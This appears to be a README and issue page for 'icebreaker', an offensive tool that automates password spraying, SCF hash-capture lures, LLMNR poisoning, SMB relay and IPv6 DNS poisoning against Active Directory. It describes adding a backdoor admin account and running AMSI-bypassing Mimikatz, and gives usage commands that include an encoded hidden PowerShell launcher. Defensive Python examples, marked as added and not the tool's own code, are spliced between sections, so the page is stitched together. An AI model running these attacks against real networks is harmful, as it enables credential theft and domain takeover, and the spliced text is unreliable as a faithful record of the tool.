
icebreaker's Introduction

icebreaker

Break the ice with that cute Active Directory environment over there. When you're cold and alone staring in at an Active Directory party but don't possess even a single AD credential to join the fun, this tool's for you.

Sequentially automates 5 internal network attacks against Active Directory to deliver you plaintext credentials. Use the --auto option to automatically acquire domain admin privileges after gaining a foothold.

Summary Details

The following attacks are performed sequentially, except that the fourth and fifth run in parallel and indefinitely.

  • Reverse bruteforce
    • Automatically acquires a list of usernames and tests each one with two of the most common AD passwords (more than two attempts may trigger account lockout policies)
  • Upload to network shares
    • Capture users' passwords with malicious file uploads to available network shares
  • Poison broadcast network protocols
    • Uses common network protocols to trick users' computers into sending you passwords
  • Man-in-the-middle SMB connections
    • Performs remote command execution against AD computers in order to gather passwords
  • Poison IPv6 DNS
    • Exploits DNS to trick AD computers into sending their users' passwords to you

Technical Details

All NetNTLMv2 hashes captured by the techniques below are autocracked with JohnTheRipper and an AD-specific password list of roughly 1 million entries.

  • Reverse bruteforce
    • Uses rpcclient to find hosts that accept null SMB sessions
    • Uses ridenum to find valid usernames via RID cycling on null SMB hosts
    • Can use theHarvester to gather additional potential usernames from a specified internet domain
    • Performs a 2 password reverse bruteforce of found usernames or you can specify a password list to use
    • Default passwords tested: P@ssw0rd and <current_season><year>, e.g., Spring2018
  • SCF upload
    • Uses Nmap to find anonymously writeable network shares via NSE script smb-enum-shares
    • Writes an SCF file to the share with a file icon path that points to your machine
    • When an AD user opens the share in File Explorer their NetNTLMv2 hash is sent to you
  • LLMNR/NBTNS/mDNS poisoning
    • Uses Responder.py to poison the layer 2 broadcast/multicast network protocols (LLMNR, NBT-NS, mDNS) and capture NetNTLMv2 hashes
  • SMB relay
    • Uses ntlmrelayx.py and Responder.py to relay SMB hashes
    • Uses Nmap to identify vulnerable relay targets via the NSE script smb-security-mode
    • Vulnerable targets will have SMBv1 enabled and SMB signing disabled
    • Successful relaying of a hash will result in the capture of a user's NetNTLMv2 hash which will be autocracked
    • If a user hash is relayed to a machine and that user is a local administrator, command execution will occur and the following will be remotely performed:
      • Add an administrative user - icebreaker:P@ssword123456
      • Run an obfuscated and AMSI bypassing version of Mimikatz
      • Mimikatz output is parsed for NTLM hashes and plaintext passwords
      • Run an obfuscated and AMSI bypassing version of Invoke-PowerDump for SAM hashes
      • Output is parsed for NTLM hashes
  • IPv6 DNS poison
    • Uses mitm6 and ntlmrelayx.py to poison IPv6 DNS in order to capture NetNTLMv2 user hashes
    • Creates fake WPAD server with authentication
    • IPv6 DNS is enabled by default in Active Directory environments
    • Note: this can cause network connectivity issues for users

How It Works

It will perform the above 5 network attacks in order. Reverse bruteforcing and SCF file uploads usually finish quickly; it then lingers on attack 3, Responder.py, for 10 minutes by default. Once that time (or the user-specified time) has passed, it moves on to the final two attacks, which run in parallel and indefinitely.

If any hosts are discovered to allow null SMB sessions, icebreaker will use ridenum to perform RID cycling for valid usernames. If you use the "-d <somedomain.com>" option, theHarvester will scrape any email addresses from the specified website, and any email usernames that are AD-compatible will be added to the reverse bruteforce username list. Icebreaker performs the reverse bruteforce with the Linux tool rpcclient, driven by 10 asyncio workers.
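The defensive counterpart to the reverse bruteforce described above is spotting it in logon telemetry. The following is an added example, not icebreaker's code: it runs a password-spray detector over constructed sample log lines laid out as "timestamp | event id | account | source ip" (standing in for the Security event 4625/4624 fields a SIEM would export). The window and account thresholds are assumptions; the point is that the signal is one source touching many accounts a couple of times each, which per-account lockout never sees.

```python
"""Detect password spraying (icebreaker's "reverse bruteforce") in Windows logon
failures. Added example, not part of icebreaker. The log lines are constructed in a
simplified "timestamp | event id | account | source ip" layout standing in for the
Security event 4625/4624 fields a SIEM would export; thresholds are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one source fails once or twice against many accounts (a spray),
# another hammers a single account (ordinary brute force that lockout already catches).
SAMPLE_LOG = """\
2018-03-05 09:00:01 | 4625 | alice | 10.0.0.50
2018-03-05 09:00:02 | 4625 | bob   | 10.0.0.50
2018-03-05 09:00:02 | 4625 | carol | 10.0.0.50
2018-03-05 09:00:03 | 4625 | dave  | 10.0.0.50
2018-03-05 09:00:03 | 4625 | erin  | 10.0.0.50
2018-03-05 09:00:04 | 4624 | frank | 10.0.0.50
2018-03-05 09:05:10 | 4625 | alice | 10.0.0.50
2018-03-05 09:05:11 | 4625 | bob   | 10.0.0.50
2018-03-05 09:14:00 | 4625 | alice | 10.0.0.77
2018-03-05 09:14:30 | 4625 | alice | 10.0.0.77
2018-03-05 09:15:00 | 4625 | alice | 10.0.0.77
"""


def parse_events(text):
    """Parse the simplified layout into dicts, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        parts = [p.strip() for p in line.split("|")]
        if len(parts) != 4:
            continue
        ts, event_id, account, source = parts
        events.append({
            "time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
            "event_id": int(event_id),
            "account": account,
            "source": source,
        })
    return events


def detect_spray(events, window=timedelta(minutes=10), min_accounts=5):
    """Return one alert per source IP whose logon failures touch at least
    `min_accounts` distinct accounts within any span of length `window`.

    A spray stays under the per-account lockout threshold (icebreaker tries two
    passwords per user), so the signal is breadth across accounts from one
    source, not depth against one account. Only 4625 (failure) events count."""
    failures = defaultdict(list)  # source ip -> [(time, account), ...]
    for ev in events:
        if ev["event_id"] == 4625:
            failures[ev["source"]].append((ev["time"], ev["account"]))

    alerts = {}
    for source, fails in failures.items():
        fails.sort()
        for i, (start, _) in enumerate(fails):
            # Every failure from this source that falls inside [start, start + window].
            in_window = [acct for t, acct in fails[i:] if t - start <= window]
            distinct = set(in_window)
            if len(distinct) < min_accounts:
                continue
            depth = max(in_window.count(a) for a in distinct)  # why lockout stays quiet
            best = alerts.get(source)
            if best is None or len(distinct) > best["accounts"]:
                alerts[source] = {
                    "source": source,
                    "window_start": start,
                    "accounts": len(distinct),
                    "max_failures_per_account": depth,
                }
    return sorted(alerts.values(), key=lambda a: a["source"])


if __name__ == "__main__":
    for alert in detect_spray(parse_events(SAMPLE_LOG)):
        print(f"{alert['source']}: {alert['accounts']} accounts from "
              f"{alert['window_start']:%H:%M:%S}, at most "
              f"{alert['max_failures_per_account']} tries per account")
```

On the sample, 10.0.0.50 is reported (five accounts, at most two failures each), while 10.0.0.77, which fails three times against one account, is left to the lockout policy.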

The SCF upload attack abuses Shell Command Files against anonymously writeable network shares. SCFs are files that can perform basic actions like showing the desktop or opening a File Explorer window. They have the curious property of allowing their file icon to be set to a network path. If you set this network path to your own machine, users who open the file share in File Explorer will automatically send their NetNTLMv2 password hash to you. Icebreaker uses the Nmap script smb-enum-shares to find anonymously writeable shares, then automatically generates and uploads the payloaded SCF.
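A share owner can hunt for exactly this lure: an .scf file whose IconFile entry is a UNC path rather than a local icon resource. The following is an added example, not icebreaker's code. It walks a directory tree (a mounted share in practice) and flags such files; the sample files it builds in a temp directory are constructed, and the ATTACKER-HOST name is a placeholder.

```python
"""Scan a share (or any directory tree) for Shell Command Files whose icon path
points at a remote host. Added example, not icebreaker's code; the sample files
are constructed and the ATTACKER-HOST name is a placeholder."""
import configparser
import os
import re
import tempfile

# A UNC path such as \\host\share\file at the start of the value.
UNC_RE = re.compile(r"^\\\\[^\\]+\\")


def scf_remote_icon(path):
    """Return the IconFile value when it is a UNC path, otherwise None.
    SCFs are tiny INI-style files; read them tolerantly and ignore non-INI content."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    with open(path, encoding="utf-8", errors="replace") as fh:
        try:
            parser.read_file(fh)
        except configparser.Error:
            return None  # not INI-shaped, so nothing Explorer would act on
    for section in parser.sections():
        for option, value in parser.items(section):
            if option.lower() == "iconfile" and UNC_RE.match(value.strip()):
                return value.strip()
    return None


def find_scf_lures(root):
    """Walk `root` and return sorted [(path, icon_path)] for .scf files with remote icons."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(".scf"):
                full = os.path.join(dirpath, name)
                icon = scf_remote_icon(full)
                if icon:
                    hits.append((full, icon))
    return sorted(hits)


def build_sample_tree():
    """Create a constructed share layout in a temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="share-audit-")
    samples = {
        # Benign: icon taken from a local binary resource.
        "Show Desktop.scf": "[Shell]\nCommand=2\nIconFile=explorer.exe,3\n"
                            "[Taskbar]\nCommand=ToggleDesktop\n",
        # Lure: icon fetched over SMB from another host (placeholder name).
        os.path.join("Public", "readme.scf"): "[Shell]\nCommand=2\n"
                                              "IconFile=\\\\ATTACKER-HOST\\share\\icon.ico\n"
                                              "[Taskbar]\nCommand=ToggleDesktop\n",
        # Not an .scf at all; must be ignored even though it mentions a UNC path.
        os.path.join("Public", "notes.txt"): "IconFile=\\\\not-an-scf\\x\n",
    }
    for rel, body in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for path, icon in find_scf_lures(build_sample_tree()):
        print(f"remote icon in {path}: {icon}")
```

Removing anonymous write access to the share is the real fix; the scanner is for finding lures already planted.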

Attack 3 uses Responder.py to poison LLMNR, NBT-NS, and mDNS multicast/broadcast protocols. When users navigate to a nonexistent network path, Responder will tell them your attacker machine is the correct path. The user's NetNTLMv2 password hash is now yours. Responder will capture hashes sent via the SCF attack, but the next attack is generally more useful for capturing SCF hashes because it has the potential of using the hash for command execution.

SMB relay is an old network attack where attackers place themselves between the SMB client and the SMB server. This allows attackers to capture and relay NetNTLMv2 hashes to hosts that have SMBv1 enabled and SMB signing disabled. ntlmrelayx.py from the Impacket library is used to relay while Responder.py is used to man-in-the-middle SMB connections. Should the SMB client user have administrative rights to any host on the network that has SMB signing disabled, ntlmrelayx.py will perform command execution on that host.
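Because relay only works against hosts that do not enforce signing, the defender's audit is the same Nmap check read the other way round. The following is an added example, not icebreaker's own parser: it reads Nmap XML and reports every host whose smb-security-mode (SMB1) or smb2-security-mode (SMB2/3) host-script result says signing is not required. Both scripts are read because hosts with SMB1 disabled, such as current Windows 10 builds, only answer the second one (the gap one issue further down reports). The XML is a constructed sample in the shape Nmap writes, not a real scan.

```python
"""Audit SMB signing from Nmap XML output. Added example, not icebreaker's own
parser. Reads both smb-security-mode (SMB1) and smb2-security-mode (SMB2/3)
host-script results. SAMPLE_XML is constructed in the shape Nmap writes."""
import re
import xml.etree.ElementTree as ET

SAMPLE_XML = """<nmaprun scanner="nmap">
  <host><status state="up"/><address addr="10.0.0.10" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-security-mode" output="&#xa;  account_used: guest&#xa;  message_signing: disabled (dangerous, but default)"/>
      <script id="smb2-security-mode" output="&#xa;  2.02: &#xa;    Message signing enabled but not required"/>
    </hostscript>
  </host>
  <host><status state="up"/><address addr="10.0.0.11" addrtype="ipv4"/>
    <hostscript>
      <script id="smb2-security-mode" output="&#xa;  3.11: &#xa;    Message signing enabled and required"/>
    </hostscript>
  </host>
  <host><status state="up"/><address addr="10.0.0.12" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-security-mode" output="&#xa;  message_signing: required"/>
    </hostscript>
  </host>
  <host><status state="up"/><address addr="10.0.0.13" addrtype="ipv4"/></host>
</nmaprun>
"""


def signing_status(script_id, output):
    """Normalise either script's text to 'required', 'supported', 'disabled' or 'unknown'."""
    text = output.lower()
    if script_id == "smb-security-mode":
        m = re.search(r"message_signing:\s*(\w+)", text)
        return m.group(1) if m else "unknown"
    if script_id == "smb2-security-mode":
        if "enabled and required" in text:
            return "required"
        if "enabled but not required" in text:
            return "supported"
        if "signing disabled" in text:
            return "disabled"
    return "unknown"


def audit_signing(xml_text):
    """Map each IPv4 address to its SMB1/SMB2 signing status and an exposure flag."""
    report = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        entry = {"smb1": None, "smb2": None}
        for script in host.iter("script"):
            sid = script.get("id", "")
            status = signing_status(sid, script.get("output", ""))
            if sid == "smb-security-mode":
                entry["smb1"] = status
            elif sid == "smb2-security-mode":
                entry["smb2"] = status
        # Signing that is merely "supported" still lets a relayed session through.
        entry["signing_not_required"] = any(
            s in ("supported", "disabled") for s in (entry["smb1"], entry["smb2"]))
        report[addr_el.get("addr")] = entry
    return report


def hosts_needing_signing(report):
    """Sorted addresses where signing is not enforced on at least one dialect."""
    return sorted(a for a, e in report.items() if e["signing_not_required"])


if __name__ == "__main__":
    for addr in hosts_needing_signing(audit_signing(SAMPLE_XML)):
        print(f"{addr}: SMB signing not required; enforce it via policy")
```

Hosts that show no script output at all (10.0.0.13 in the sample) are reported as unknown rather than safe; they may simply not have had 445/tcp open during the scan.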

Once ntlmrelayx relays a captured hash it will run a base64-encoded powershell command that first adds an administrative user (icebreaker:P@ssword123456) then runs an obfuscated and AMSI-bypassing version of Mimikatz, followed by an obfuscated and AMSI-bypassing version of Invoke-PowerDump. The output of Invoke-Mimikatz and Invoke-PowerDump is parsed for plaintext passwords or NTLM hashes and delivered to the user in the standard output as well as in the found-passwords.txt file. NTLM hashes, unlike NetNTLMv2 hashes, can be used just like a plaintext password for authentication to other AD hosts. The one caveat is that ever since Microsoft’s KB2871997 patch, only the builtin RID 500 local administrator account can be used in pass-the-hash attacks.

The final attack uses the tool mitm6 to perform a man-in-the-middle IPv6 DNS attack against the whole network. This forces hosts on the network to use the attacker's machine as their DNS server. Once set as their DNS server, the attacker serves malicious WPAD proxy setting files to the victims and gathers their NetNTLMv2 hashes. These hashes are relayed using ntlmrelayx.py for further remote code execution possibilities. One thing to note is that this attack is prone to causing issues on the network. It often causes certificate errors on client machines in the browser. It'll also likely slow the network down. The beauty of this attack, however, is that Windows AD environments are vulnerable by default.

If icebreaker is run with the --auto [tmux/xterm] flag, then upon reaching attack 4 icebreaker will run Empire and DeathStar in either a tmux session or xterm windows. With this option, instead of running mimikatz on the remote host that we relayed the hash to, icebreaker will add an administrative user then run Empire's powershell launcher code to get an agent on the remote machine. DeathStar will use this agent to automate the process of achieving domain admin. Empire and DeathStar will not close when you exit icebreaker.

Password cracking is done with JohnTheRipper and a custom wordlist. The list is derived from merged.txt, which is every password from the SecLists GitHub account combined. The wordlist was pruned to exclude passwords that are all lowercase, all uppercase, all symbols, shorter than 7 characters, or longer than 32 characters. These rules conform to the default Active Directory password requirements and brought the list from 20 million down to just over 1 million, which makes password cracking extremely fast.

Installation

As root:

./setup.sh
pipenv install --three
pipenv shell

You might get an error after running pipenv install. If so, update to a version of pipenv newer than 11.9.0: git clone pipenv from GitHub, then run apt-get remove python-pipenv && python setup.py install from within the cloned folder.

Docker Usage

There are still a few bugs to work out with the docker image, so this is likely to error for you, but it's almost there. From the Git repo:

docker build --rm -t danmcinerney/icebreaker .
docker run danmcinerney/icebreaker

Or append the commands you'd normally add to icebreaker (don't forget to map volumes):

docker run -v $(pwd)/logs:/icebreaker/logs -v $(pwd)/hashes:/icebreaker/hashes -v $(pwd)/icebreaker-scan.xml:/icebreaker/icebreaker-scan.xml -v $(pwd)/submodules:/icebreaker/submodules -e PYTHONUNBUFFERED=0 danmcinerney/icebreaker -x icebreaker-scan.xml

Note: You'll want to map ports for listeners with docker's -p <host>:<container> flag.

Usage

Run as root. Read from a newline separated list of IP addresses (single IPs or CIDR ranges) and instead of having ntlmrelayx add a user and mimikatz the victim upon hash relay, have it execute a custom command on the victim machine. In this example we're giving it a command similar to what Empire might give us for a powershell launcher one-liner.

./icebreaker -l targets.txt -c "powershell -nop -w hidden -exec bypass -enc WwFk..."

Read from a hostlist, tell Responder to use the eth0 interface rather than the default gateway interface, let Responder run for 30m instead of the usual 10m, and run the default ntlmrelayx post-relay commands to dump the SAM off the victim server.

./icebreaker -l targets.txt -i eth0 -t 30 -c default

Use an Nmap XML output file, skip all five attacks plus don't autocrack hashes, and use a custom password list for the reverse bruteforce attack. (Note that since this example skips attack 1 via '-s rid', the password list specified won't even get used; it is here only as an example.)

./icebreaker.py -x nmapscan.xml -s rid,scf,llmnr,relay,dns,crack -p /home/user/password-list.txt

Fire-and-forget usage: input targets file, scrape companydomain.com for email usernames to be added to the reverse bruteforce attack, skip mitm6's IPv6 DNS poisoning, and run Empire and DeathStar in either tmux or xterm windows once attack 4 starts in order to gain automated domain admin. The goal of this usage is to fire off the command Monday at 9am then go take a short, uninterrupted break until Friday at 4:30pm at which point we come back to a domain admin shell waiting for us. We skip attack 5 (mitm6) because it can sometimes cause network issues and we don't want angry clients interrupting our hard-earned break.

./icebreaker.py -l targets.txt -d companydomain.com -s dns --auto [tmux/xterm]

icebreaker's People

Contributors

danmcinerney


icebreaker's Issues

Attack 1: RID Cycling fails

sudo ./icebreaker.py -l target.txt -c "net user /add User1 [email protected]"
[*] Nmap running: 0.0 min
[*] Nmap running: 0.5 min
[*] Nmap running: 1.0 min
[*] Nmap running: 1.5 min
[*] Nmap running: 2.0 min
[*] Nmap running: 2.5 min
[*] Parsing hosts
[+] SMB open:

[*] Attack 1: RID cycling in null SMB sessions into reverse bruteforce
[*] Checking for null SMB sessions
[*] Example command that will run: rpcclient -U "" 172.46.100.9 -N -c "lsaquery"
/home/menace/icebreaker/./icebreaker.py:339: RuntimeWarning: coroutine 'create_subprocess_shell' was never awaited
  p = yield from asyncio.create_subprocess_shell(cmd, stdout=PIPE, stderr=PIPE)
RuntimeWarning: Enable tracemalloc to get the object allocation traceback
Traceback (most recent call last):
  File "/home/menace/icebreaker/./icebreaker.py", line 1603, in <module>
    main(report, args)
  File "/home/menace/icebreaker/./icebreaker.py", line 1539, in main
    prev_creds, prev_users, domains = smb_reverse_brute(loop, hosts, args, passwords, prev_creds, prev_users, DCs)
                                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/menace/icebreaker/./icebreaker.py", line 597, in smb_reverse_brute
    rpc_output = async_get_outputs(loop, dom_cmds)
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/menace/icebreaker/./icebreaker.py", line 370, in async_get_outputs
    output += loop.run_until_complete(asyncio.gather(*coros))
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/asyncio/base_events.py", line 653, in run_until_complete
    return future.result()
           ^^^^^^^^^^^^^^^
  File "/home/menace/icebreaker/./icebreaker.py", line 339, in get_output
    p = yield from asyncio.create_subprocess_shell(cmd, stdout=PIPE, stderr=PIPE)
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: cannot 'yield from' a coroutine object in a non-coroutine generator
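The traceback above is the generator-based coroutine style (`yield from` inside a plain function once decorated with `asyncio.coroutine`) meeting Python 3.11, where that decorator no longer exists. The following is an added example, not icebreaker's code: the same get_output/async_get_outputs pattern, a bounded pool of asyncio workers each running one shell command, written in the async/await form that current Python accepts. The commands are harmless Python one-liners built from sys.executable so the block runs anywhere; the worker count of 10 mirrors the README's description and is otherwise an assumption.

```python
"""Run many shell commands through a bounded pool of asyncio workers, in the
async/await form that replaces the `yield from` generator style. Added example,
not icebreaker's code; demo commands are harmless Python one-liners."""
import asyncio
import sys
from asyncio.subprocess import PIPE


async def get_output(cmd, sem):
    """Run one shell command and return (cmd, returncode, stdout, stderr).

    `await` replaces `yield from`; the semaphore is what keeps only N commands in
    flight at once, so a long target list does not spawn a process per target."""
    async with sem:
        p = await asyncio.create_subprocess_shell(cmd, stdout=PIPE, stderr=PIPE)
        out, err = await p.communicate()
    return cmd, p.returncode, out.decode(errors="replace"), err.decode(errors="replace")


async def _gather(cmds, workers):
    sem = asyncio.Semaphore(workers)
    # gather() preserves input order, so results line up with cmds.
    return await asyncio.gather(*(get_output(c, sem) for c in cmds))


def async_get_outputs(cmds, workers=10):
    """Synchronous entry point: run all commands with at most `workers` in flight.
    asyncio.run() creates and closes the loop, replacing loop.run_until_complete()."""
    return asyncio.run(_gather(cmds, workers))


def demo_commands(n=5):
    """Constructed stand-ins for the per-host commands: print i*i via the current interpreter."""
    py = sys.executable
    return [f'"{py}" -c "print({i} * {i})"' for i in range(n)]


if __name__ == "__main__":
    for cmd, rc, out, err in async_get_outputs(demo_commands(), workers=3):
        print(f"rc={rc} out={out.strip()!r} err={err.strip()!r}  <- {cmd}")
```

The semaphore, not the number of coroutines created, is the real concurrency limit; creating the coroutine objects up front is cheap, but each one only starts its subprocess once it acquires a slot.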

Username enhancement for reverse bruteforce & Kerberoasting

Hi Dan,

Firstly, wow, what an amazing tool. I can see this making my life so much easier! Thanks so much. I have a couple of suggestions for improvements/enhancements:

  1. It would be great to have an option to provide a list of additional usernames/emails in a text file that have been enumerated separately. This could also be automated by adding tools such as LinkedInt/Prowl/InSpy (can do multiple as they use different methods: LinkedInt by company name on the site, Prowl by search engine results), incorporating these to scrape and generate usernames based on LinkedIn OSINT.

  2. I know DeathStar uses bloodhound & empire to escalate through the network, but would it be possible to include Kerberoasting in here somewhere? Part of initial access using GetUserSPNs to get the tickets, run them through John with your custom list and add successes into Deathstar to give it more to work with? Putting the kerberos tickets into a separate file that's clearly marked would be great so they can be extracted & run through a more intensive cracking process if needed.

RID Cycling fails

[*] Checking for usernames. This may take a bit...
[*] Example command that will run: python2 /home/tester/Documents/icebreaker/submodules/ridenum/ridenum.py 10.3.10.43 500 50000 | tee -a logs/ridenum.log
Traceback (most recent call last):
  File "./icebreaker.py", line 1602, in <module>
    main(report, args)
  File "./icebreaker.py", line 1538, in main
    prev_creds, prev_users, domains = smb_reverse_brute(loop, hosts, args, passwords, prev_creds, prev_users, DCs)
  File "./icebreaker.py", line 618, in smb_reverse_brute
    ip_users, prev_users = get_usernames(ridenum_output, prev_users)
  File "./icebreaker.py", line 449, in get_usernames
    out_lines = host.splitlines()
AttributeError: 'NoneType' object has no attribute 'splitlines'

RID Fails

If I exclude the RID attack we are good, but if I do the default, I get:

[*] Attack 1: RID cycling in null SMB sessions into reverse bruteforce
[*] Checking for null SMB sessions
[*] Example command that will run: rpcclient -U "" 10.207.4.3 -N -c "lsaquery"
Traceback (most recent call last):
  File "./icebreaker.py", line 1536, in <module>
    main(report, args)
  File "./icebreaker.py", line 1472, in main
    prev_creds, prev_users, domains = smb_reverse_brute(loop, hosts, args, passwords, prev_creds, prev_users, DCs)
  File "./icebreaker.py", line 589, in smb_reverse_brute
    null_sess_hosts = get_null_sess_hosts(rpc_output)
  File "./icebreaker.py", line 399, in get_null_sess_hosts
    if 'Domain Name:' in out:
TypeError: argument of type 'NoneType' is not iterable

Thoughts????

error find john

Traceback (most recent call last):
  File "./icebreaker.py", line 1536, in <module>
    main(report, args)
  File "./icebreaker.py", line 1503, in main
    prev_creds, new_lines = parse_responder_log(args, prev_lines, prev_creds)
  File "./icebreaker.py", line 1092, in parse_responder_log
    prev_creds = get_cracked_pwds(prev_creds)
  File "./icebreaker.py", line 924, in get_cracked_pwds
    out, err = Popen('submodules/JohnTheRipper/run/john --show hashes/{}'.format(x).split(), stdout=PIPE, stderr=PIPE).communicate()
  File "/usr/lib/python3.6/subprocess.py", line 709, in __init__
    restore_signals, start_new_session)
  File "/usr/lib/python3.6/subprocess.py", line 1344, in _execute_child
    raise child_exception_type(errno_num, err_msg, err_filename)
FileNotFoundError: [Errno 2] No such file or directory: 'submodules/JohnTheRipper/run/john': 'submodules/JohnTheRipper/run/john'

Install fails when creating virtual environment

[*] Running: pipenv install --three
Creating a virtualenv for this project…
Using /usr/bin/python3 to create virtualenv…
Traceback (most recent call last):
  File "/usr/local/bin/pew", line 7, in <module>
    from pew.pew import pew
  File "/usr/local/lib/python2.7/dist-packages/pew/__init__.py", line 3, in <module>
    from . import pew
  File "/usr/local/lib/python2.7/dist-packages/pew/pew.py", line 16, in <module>
    from backports.shutil_get_terminal_size import get_terminal_size
ImportError: No module named shutil_get_terminal_size

Virtualenv location:
Creating a virtualenv for this project…
Traceback (most recent call last):
  File "/usr/local/bin/pew", line 7, in <module>
    from pew.pew import pew
  File "/usr/local/lib/python2.7/dist-packages/pew/__init__.py", line 3, in <module>
    from . import pew
  File "/usr/local/lib/python2.7/dist-packages/pew/pew.py", line 16, in <module>
    from backports.shutil_get_terminal_size import get_terminal_size
ImportError: No module named shutil_get_terminal_size

on

Linux 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 GNU/Linux

Installation on Kali not working

I wanted to play around with icebreaker. As I had problems with pipenv on my regular Kali, I downloaded the latest rolling release VirtualBox OVA.

I did a dist upgrade and updated everything to latest (and created a snapshot after that).

Then I cloned the icebreaker repo - and did ./setup.sh and then pipenv shell.

Unfortunately the same error as with my regular kali box:

(icebreaker-pYXGQqZV) root@kali:/opt/icebreaker# ./icebreaker.py 
Traceback (most recent call last):
  File "./icebreaker.py", line 13, in <module>
    import libtmux
ModuleNotFoundError: No module named 'libtmux'
(icebreaker-pYXGQqZV) root@kali:/opt/icebreaker# 

So there seems to be a problem with the pipenv.

If I try to recreate the environment I get

(icebreaker-pYXGQqZV) root@kali:/opt/icebreaker# pipenv install --three
Virtualenv already exists!
Remove existing virtualenv? [Y/n]: y
Removing existing virtualenv…
Creating a virtualenv for this project…
Using /usr/bin/python3 (3.6.4) to create virtualenv…
⠋Running virtualenv with interpreter /usr/bin/python3
Using base prefix '/usr'
New python executable in /root/.local/share/virtualenvs/icebreaker-pYXGQqZV/bin/python3
Also creating executable in /root/.local/share/virtualenvs/icebreaker-pYXGQqZV/bin/python
Installing setuptools, pip, wheel...done.

Virtualenv location: /root/.local/share/virtualenvs/icebreaker-pYXGQqZV
Pipfile.lock not found, creating…
Locking [dev-packages] dependencies…
ne 75, in <module>
    main()
  File "/usr/local/lib/python2.7/dist-packages/pipenv/resolver.py", line 30, in main
    import pipenv.core
  File "/usr/local/lib/python2.7/dist-packages/pipenv/../pipenv/__init__.py", line 21, in <module>
    from .cli import cli
  File "/usr/local/lib/python2.7/dist-packages/pipenv/../pipenv/cli.py", line 9, in <module>
    import delegator
  File "/usr/local/lib/python2.7/dist-packages/pipenv/vendor/delegator.py", line 8, in <module>
    from pexpect.popen_spawn import PopenSpawn
  File "/usr/local/lib/python2.7/dist-packages/pipenv/vendor/pexpect/popen_spawn.py", line 14, in <module>
    from Queue import Queue, Empty  # Python 2
ModuleNotFoundError: No module named 'Queue'

/usr/local/lib/python2.7/dist-packages/pipenv/utils.py:1186: ResourceWarning: Implicitly cleaning up <TemporaryDirectory '/tmp/pipenv-pWdkyP-requirements'>
  warnings.warn(warn_message, ResourceWarning)
(icebreaker-pYXGQqZV) root@kali:/opt/icebreaker# 

I also found a mention in the closed issues that it can help to do pipenv install --two followed by pipenv install --three which isn't fixing the error in case of a fresh, updated kali install.

Do you have any further advice on how to install/fix the python problems on Kali Linux?

Non UTF-8 chars in Responder-Session.log causes crash

If the Responder-Session.log contains chars that are not UTF-8, the program crashes when it tries to call readlines(). This can be fixed by appending error='replace' to the arguments when calling open on the file.
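As an added example (not icebreaker's code), the following shows the failure and the tolerant read side by side: a constructed log containing one lone Latin-1 byte makes a strict UTF-8 read raise UnicodeDecodeError, while opening with errors="replace" turns the bad byte into U+FFFD and lets the rest parse. The line shape follows the Responder log line quoted elsewhere on this page; the poisoned-answer message text is an assumption.

```python
"""Read a Responder-Session.log that may contain non-UTF-8 bytes without the
UnicodeDecodeError this issue describes. Added example, not icebreaker's code;
the log content is constructed."""
import re
import tempfile

# [module] MM/DD/YYYY HH:MM:SS AM/PM - message
LINE_RE = re.compile(
    r"^\[(?P<module>[^\]]+)\]\s+"
    r"(?P<ts>\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2} [AP]M)\s+-\s+"
    r"(?P<msg>.*)$")


def write_sample_log():
    """Write constructed log bytes to a temp file and return its path."""
    lines = [
        b"[Responder] 01/22/2018 03:44:02 PM - Responder Started: "
        b"['submodules/Responder/Responder.py', '-wrd', '-I', 'eth0']\n",
        # \xc9 is a lone Latin-1 byte, invalid as UTF-8: this is what crashes readlines().
        b"[Responder] 01/22/2018 03:44:05 PM - Poisoned answer sent to 10.0.0.23 "
        b"for name FILESERV\xc9R\n",
        b"not a responder line at all\n",
    ]
    with tempfile.NamedTemporaryFile("wb", suffix=".log", delete=False) as fh:
        fh.writelines(lines)
    return fh.name


def strict_read_fails(path):
    """True if a strict UTF-8 readlines() rejects the file, as the issue reports."""
    try:
        with open(path, encoding="utf-8") as fh:
            fh.readlines()
    except UnicodeDecodeError:
        return True
    return False


def parse_session_log(path):
    """Tolerantly decode and parse the log into dicts. Undecodable bytes become
    U+FFFD, so one bad byte costs a character instead of the whole run."""
    events = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            m = LINE_RE.match(line.rstrip("\n"))
            if m:
                events.append(m.groupdict())
    return events


if __name__ == "__main__":
    path = write_sample_log()
    print("strict read fails:", strict_read_fails(path))
    for ev in parse_session_log(path):
        print(ev["ts"], ev["msg"])
```

The keyword is errors (plural); passing error= would raise a TypeError from open() rather than fix anything.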

Feature request: allow option to specify an interface to attack

Very cool tool! Just having this one minor issue.

I am specifying a host list that has only targets that can be reached via eth1 on my machine, but it is starting responder to only listen on eth0. I don't have the option of specifying which interface I want.

[Responder] 01/22/2018 03:44:02 PM - Responder Started: ['submodules/Responder/Responder.py', '-wrd', '-I', 'eth0']

ModuleNotFoundError: No module named 'libtmux'

Hi,
When I install and run "python3 icebreaker.py -l targets.txt" I get "ModuleNotFoundError: No module named 'libtmux'". Anyone had experience of this and know what I'm doing wrong?
Thanks.

Option to not add local admin when running

Hey, would it be possible to have a flag to not add the local admin flag when running? As I run into lots of solutions which kill the connection immediately if this happens. Many thanks!

